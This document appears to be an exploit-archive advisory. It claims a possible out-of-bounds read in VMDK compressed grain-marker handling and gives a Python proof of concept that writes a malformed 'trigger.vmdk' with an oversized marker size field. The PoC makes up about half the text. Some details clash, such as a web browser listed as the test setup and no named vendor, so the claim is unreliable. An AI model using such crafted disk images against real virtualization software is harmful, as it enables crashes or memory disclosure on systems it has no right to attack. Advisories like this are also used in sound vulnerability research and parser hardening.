=============================================================================================================================================
| # Title     : Improper Bounds Validation in VMDK Grain Marker Handling Leading to Potential Out-of-Bounds Read                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : No standalone download available                                                                                            |
=============================================================================================================================================

[+] Summary    : A flaw may exist in the handling of compressed grain markers within the VMDK monolithicSparse format. 
                 If the size field in a grain marker is not properly validated against the remaining cluster boundary (excluding the marker header size), 
				 the decompression routine may process more data than safely available. This can potentially result in an out-of-bounds read condition due to improper bounds checking.
                 The issue stems from failing to ensure that the declared compressed data size does not exceed the actual buffer space after accounting for 
				 the marker structure. Proper validation of marker size, boundary checks, and strict decompression limits are required to prevent memory safety violations.

[+] POC   : 

import struct

def create_malicious_vmdk(filename):

    magic = b"KDMV"
    version = struct.pack("<I", 1)
    flags = struct.pack("<I", 3) # VMDK4_COMPRESSION_MARKER
    capacity = struct.pack("<Q", 2048) 
    granularity = struct.pack("<Q", 128) 
    desc_offset = struct.pack("<Q", 1)
    desc_size = struct.pack("<Q", 1)
    rg_size = struct.pack("<I", 1)
    gd_offset = struct.pack("<Q", 0) 

    header = magic + version + flags + capacity + granularity + \
             desc_offset + desc_size + rg_size + gd_offset
    header = header.ljust(512, b'\x00')

    lba = struct.pack("<Q", 0)

    malicious_size = 64 * 1024 
    size = struct.pack("<I", malicious_size)
    
    marker = lba + size
    
    data = b"\x78\x9c\x03\x00\x00\x00\x00\x01" 
    data = data.ljust(malicious_size, b'\x41')

    with open(filename, "wb") as f:
        f.write(header)
        f.write(marker)
        f.write(data)

    print(f"[*] Created malicious file: {filename}")
    print(f"[*] Marker size set to: {malicious_size} bytes")

if __name__ == "__main__":
    create_malicious_vmdk("trigger.vmdk")
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================